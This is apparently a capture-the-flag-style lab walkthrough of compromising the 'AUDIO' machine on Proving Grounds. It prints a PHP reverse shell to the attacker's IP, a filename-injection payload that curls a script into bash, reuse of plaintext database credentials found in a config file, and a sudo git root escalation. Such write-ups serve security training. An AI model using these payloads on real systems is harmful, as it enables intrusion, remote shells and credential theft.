Summary #
On port 80 there is an upload functionality that allows uploading MP3 and MPEG files. We upload a sample MP3 file and add .php to the .mp3 extension using BURP. Also we add a PHP reverse shell command to get initial access as the www-data user. Finding MySQL credentials which are reused by the jason user we can move laterally. As the jason user we can run /usr/bin/git with sudo without a password, which allows us to escalate our privileges to the root user.
Specifications #
- Name: AUDIO
- Platform: PG PRACTICE
- Points: 10
- Difficulty: Intermediate
- System overview: Linux audio 5.4.0-211-generic #231-Ubuntu SMP Tue Mar 11 17:06:58 UTC 2025 x86_64 x86_64 x86_64 GNU/Linux
- IP address: 192.168.142.90
- OFFSEC provided credentials: None
- HASH:
local.txt:94164584a4259d197ce2123d682d47a1 - HASH:
proof.txt:a7885e2511071a6346b4c6d51eddfa99
Preparation #
First we’ll create a directory structure for our files, set the IP address to a bash variable and ping the target:
## create directory structure
mkdir audio && cd audio && mkdir enum files exploits uploads tools
## list directory
ls -la
total 28
drwxrwxr-x 7 kali kali 4096 Sep 27 18:33 .
drwxrwxr-x 80 kali kali 4096 Sep 27 18:33 ..
drwxrwxr-x 2 kali kali 4096 Sep 27 18:33 enum
drwxrwxr-x 2 kali kali 4096 Sep 27 18:33 exploits
drwxrwxr-x 2 kali kali 4096 Sep 27 18:33 files
drwxrwxr-x 2 kali kali 4096 Sep 27 18:33 tools
drwxrwxr-x 2 kali kali 4096 Sep 27 18:33 uploads
## set bash variable
ip=192.168.142.90
## ping target to check if it's online
ping $ip
PING 192.168.142.90 (192.168.142.90) 56(84) bytes of data.
64 bytes from 192.168.142.90: icmp_seq=1 ttl=61 time=23.6 ms
64 bytes from 192.168.142.90: icmp_seq=2 ttl=61 time=23.1 ms
^C
--- 192.168.142.90 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1002ms
rtt min/avg/max/mdev = 23.123/23.349/23.576/0.226 ms
Reconnaissance #
Portscanning #
Using Rustscan we can see what TCP ports are open. This tool is part of my default portscan flow.
## run the rustscan tool
sudo rustscan -a $ip | tee enum/rustscan
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
Open ports, closed hearts.
[~] The config file is expected to be at "/root/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.142.90:22
Open 192.168.142.90:80
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-27 18:33 CEST
Initiating Ping Scan at 18:33
Scanning 192.168.142.90 [4 ports]
Completed Ping Scan at 18:33, 0.06s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 18:33
Completed Parallel DNS resolution of 1 host. at 18:33, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 18:33
Scanning 192.168.142.90 [2 ports]
Discovered open port 80/tcp on 192.168.142.90
Discovered open port 22/tcp on 192.168.142.90
Completed SYN Stealth Scan at 18:33, 0.06s elapsed (2 total ports)
Nmap scan report for 192.168.142.90
Host is up, received echo-reply ttl 61 (0.022s latency).
Scanned at 2025-09-27 18:33:59 CEST for 0s
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 61
80/tcp open http syn-ack ttl 61
Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.25 seconds
Raw packets sent: 6 (240B) | Rcvd: 3 (116B)
Copy the output of open ports into a file called ports within the files directory.
## edit the ``files/ports` file
nano files/ports
## content `ports` file:
22/tcp open ssh syn-ack ttl 61
80/tcp open http syn-ack ttl 61
Run the following command to get a string of all open ports and use the output of this command to paste within NMAP:
## get a list, comma separated of the open port(s)
cd files && cat ports | cut -d '/' -f1 > ports.txt && awk '{printf "%s,",$0;n++}' ports.txt | sed 's/.$//' > ports && rm ports.txt && cat ports && cd ..
## output previous command
22,80
## use this output in the `nmap` command below:
sudo nmap -T3 -p 22,80 -sCV -vv $ip -oN enum/nmap-services-tcp
Output of NMAP:
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 61 OpenSSH 8.2p1 Ubuntu 4ubuntu0.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 6d:9d:97:5e:77:2d:c0:48:3a:0f:47:0b:dc:18:95:2d (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC/9JbI8lQG9wYbfpt8TpduFQSqwTfbK82ywJcqf4PirW43l3EUY+/Ej7VY97Tc8Utrbwl19xUgGi5qJetcpygA5YmTqT1p+TLG051ogzpb32k0NzgYNDmhFgXNlGZnBsR/ZVFP39b31/2Gmk7wEu0OO5qAU0ZMv/YK1MTBpcK6OB1KEZ5d3H78JQEbZgF1vV5qhkN4s4rc+yDDc71CvkLFeRNQceHDaeLGY6giXyZCCf+Jr+VA9V+aCLOeXcKjvMli6HyVWv+QoaHwl3xeW9CfEACE29/eDShScIx+PX4CcYA0YIY92Kl8KEptBxZx4j1bD6eGatXwGpL7OO1jBq1yErKtzKU11yQkHlrjz6IXH2QHJA7hXuc26BJqfqwe/mI8QHnLR6c4ToIDKQsfw65BRtEGnErfI3msjbBnqWFRxCs1LvetKf1Soe+YD1AA+asaQfy6ZcjORNthX6/D5G+d1PdTq8bTCU7N49OSW9GHqNxmTRQSf3LBYhdyGU6oSd8=
| 256 78:53:85:ac:47:0f:6d:4a:92:03:1e:60:08:e0:78:b3 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBOXft7ciEDz0EBueFUwVPkZRhuWzwUEi0QPlZbR0dBIs0eeRlgltoG0waAGLnczcyInQvkVU/hLE6YqTHplx7ks=
| 256 cc:95:0e:40:8e:62:bd:d9:36:ad:ad:3a:96:cf:1b:dd (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAICopYJAhCoApi0cz7o5wplqKgDxbsHpaTXUK/bGDdP6H
80/tcp open http syn-ack ttl 61 Apache httpd 2.4.41 ((Ubuntu))
| http-methods:
|_ Supported Methods: OPTIONS HEAD GET POST
|_http-title: Audio
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Initial Access #
80/tcp open http syn-ack ttl 61 Apache httpd 2.4.41 ((Ubuntu))
| http-methods:
|_ Supported Methods: OPTIONS HEAD GET POST
|_http-title: Audio
|_http-server-header: Apache/2.4.41 (Ubuntu)
On port 80 there is a website called AUDIOIMPROVEMENT.
On the site itself we don’t find any interesting functions to (ab)use. So, let’s run gobuster to see if there are interesting directories/files. There is a directory upload and audio-files directory that are interesting. In the audio-files directory we find a uploaded.php file.
## enumerate directories using `gobuster`
gobuster dir -t 100 -u http://$ip:80/ -w /opt/SecLists/Discovery/Web-Content/raft-large-directories.txt | tee enum/raft-large-dir-raw-80
===============================================================
Gobuster v3.8
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.142.90:80/
[+] Method: GET
[+] Threads: 100
[+] Wordlist: /opt/SecLists/Discovery/Web-Content/raft-large-directories.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.8
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/vendor (Status: 301) [Size: 317] [--> http://192.168.142.90/vendor/]
/assets (Status: 301) [Size: 317] [--> http://192.168.142.90/assets/]
/server-status (Status: 403) [Size: 279]
/upload (Status: 301) [Size: 317] [--> http://192.168.142.90/upload/]
/audio-files (Status: 403) [Size: 279]
===============================================================
Finished
===============================================================
## enumerate files using `gobuster`
gobuster dir -t 100 -u http://$ip:80/audio-files/ --exclude-length 279 -w /opt/SecLists/Discovery/Web-Content/raft-small-words.txt -x php,txt | tee enum/gobuster-raft-small-words-raw-80-audio-files
===============================================================
Gobuster v3.8
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.142.90:80/audio-files/
[+] Method: GET
[+] Threads: 100
[+] Wordlist: /opt/SecLists/Discovery/Web-Content/raft-small-words.txt
[+] Negative Status codes: 404
[+] Exclude Length: 279
[+] User Agent: gobuster/3.8
[+] Extensions: php,txt
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/uploader.php (Status: 200) [Size: 1078]
===============================================================
Finished
===============================================================
Browsing to this endpoint we an upload functionality for uploading mp3 and mpeg files.
So, download a mp3 sample file and upload it to the application. Before we send it, start BURP and intercept the request.
## change directory
cd uploads
## download mp3 sample
wget https://download.samplelib.com/mp3/sample-3s.mp3
--2025-09-27 19:48:34-- https://download.samplelib.com/mp3/sample-3s.mp3
Resolving download.samplelib.com (download.samplelib.com)... 188.227.84.172
Connecting to download.samplelib.com (download.samplelib.com)|188.227.84.172|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 52079 (51K) [audio/mpeg]
Saving to: ‘sample-3s.mp3’
sample-3s.mp3 100%[=================================================>] 50.86K --.-KB/s in 0.01s
2025-09-27 19:48:34 (3.85 MB/s) - ‘sample-3s.mp3’ saved [52079/52079]
## get the local IP address on tun0
ip a s tun0 | grep "inet " | awk '{print $2}' | sed 's/\/.*//g'
192.168.45.160
Once we got the request in BURP repeater tab we add the .php extension on to our filename and we add our reverse shell PHP command at the end of the file: <?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.45.160/9001 0>&1'"); ?>. Then we click on Send.
After we send the request, we check if the file is indeed uploaded by browsing to this URL: (http://192.168.142.90/upload/). We do see our newly uploaded .php file.
Now we need to setup a listener and click on the .php file in the browser to trigger our reverse shell command and get initial access as the www-data user in the /var/www/html/upload directory. We could also have gotten initial access by abusing the RCE vulnerability in the filename (https://www.vaadata.com/blog/rce-vulnerability-in-a-file-name/), but this is easier. The payload would then be in BURP: sample-3s.mp3\";php -r '$sl=chr(47);$dot=chr(46);$pip=chr(124);echo shell_exec(\"curl 192${dot}168${dot}222${dot}133${sl}shell${dot}sh${pip}bash\");';#.
## setup a listener
nc -lvnp 9001
listening on [any] 9001 ...
## catch the reverse shell
nc -lvnp 9001
listening on [any] 9001 ...
connect to [192.168.45.160] from (UNKNOWN) [192.168.142.90] 39174
bash: cannot set terminal process group (975): Inappropriate ioctl for device
bash: no job control in this shell
www-data@audio:/var/www/html/upload$
## find `local.txt` on the filesystem
www-data@audio:/var/www/html/upload$ find / -iname 'local.txt' 2>/dev/null
/home/jason/local.txt
## print `local.txt`
www-data@audio:/var/www/html/upload$ cat /home/jason/local.txt
94164584a4259d197ce2123d682d47a1
Lateral Movement #
To get a proper TTY we upgrade our shell using the script binary.
## determine location script binary
which script
/usr/bin/script
## start the script binary, after that press CTRL+Z
/usr/bin/script -qc /bin/bash /dev/null
## after this command press the `enter` key twice
stty raw -echo ; fg ; reset
## run the following to be able to clear the screen and set the terrminal correct
export TERM=xterm && stty columns 200 rows 200
Now, upload linpeas.sh to the target and run it.
## change directory locally
cd uploads
## download latest version of linpeas.sh
wget https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh
## get local IP address on tun0
ip a s tun0 | grep "inet " | awk '{print $2}' | sed 's/\/.*//g'
192.168.45.160
## start local webserver
python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
## on target
## change directory
www-data@audio:/var/www/html/upload$ cd /var/tmp
www-data@audio:/var/tmp$
## download `linpeas.sh`
www-data@audio:/var/tmp$ wget http://192.168.45.160/linpeas.sh
--2025-09-27 18:03:43-- http://192.168.45.160/linpeas.sh
Connecting to 192.168.45.160:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 961834 (939K) [text/x-sh]
Saving to: 'linpeas.sh'
linpeas.sh 0%[ linpeas.sh 100%[=============================================================================================================>] 939.29K 5.02MB/s in 0.2s
2025-09-27 18:03:43 (5.02 MB/s) - 'linpeas.sh' saved [961834/961834]
## set the execution bit
www-data@audio:/var/tmp$ chmod +x linpeas.sh
## run `linpeas.sh`
www-data@audio:/var/tmp$ ./linpeas.sh
The linpeas.sh output shows the file /srv/www/osTicket/include/ost-config.php containing define('DBUSER','osticket');. Looking into this file we find MySQL credentials: osticket:WeArePartOfThisWave334, but there is no MySQL server running on the target. Listing the users with a shell, we get three users: root, jason and ubuntu. Trying this credential on all users we can move lateral to the jason user.
## print `/srv/www/osTicket/include/ost-config.php`
www-data@audio:/var/tmp$ cat /srv/www/osTicket/include/ost-config.php
<SNIP>
# Mysql Login info
#
define('DBTYPE','mysql');
# DBHOST can have comma separated hosts (e.g db1:6033,db2:6033)
define('DBHOST','localhost');
define('DBNAME','osticket');
define('DBUSER','osticket');
define('DBPASS','WeArePartOfThisWave334');
<SNIP>
## print users with a shell
www-data@audio:/var/tmp$ cat /etc/passwd | grep sh$
root:x:0:0:root:/root:/bin/bash
ubuntu:x:1000:1001:Ubuntu:/home/ubuntu:/bin/bash
jason:x:1001:1003::/home/jason:/bin/sh
## switch to user `jason`
www-data@audio:/var/tmp$ su jason Password:
$
## get a bash shell
$ bash
jason@audio:/var/tmp$
Privilege Escalation #
As the jason user we list our sudo privileges and see we can run /usr/bin/git with sudo without a password. Using this binary and GTFOBins (https://gtfobins.github.io/gtfobins/git/#sudo), once we run the command we type !/bin/bash and escalate our privileges to the root user.
## list sudo privileges
jason@audio:/var/tmp$ sudo -l
Matching Defaults entries for jason on audio:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User jason may run the following commands on audio:
(ALL) NOPASSWD: /usr/bin/git
## run `/usr/bin/git` with sudo
jason@audio:/var/tmp$ sudo /usr/bin/git -p help config
## once the config file is shown in less, type:
!/bin/bash
root@audio:/var/tmp#
## print `proof.txt`
root@audio:/var/tmp# cat /root/proof.txt
a7885e2511071a6346b4c6d51eddfa99
References #
[+] https://download.samplelib.com/mp3/sample-3s.mp3
[+] https://www.vaadata.com/blog/rce-vulnerability-in-a-file-name/
[+] https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh
[+] https://gtfobins.github.io/gtfobins/git/#sudo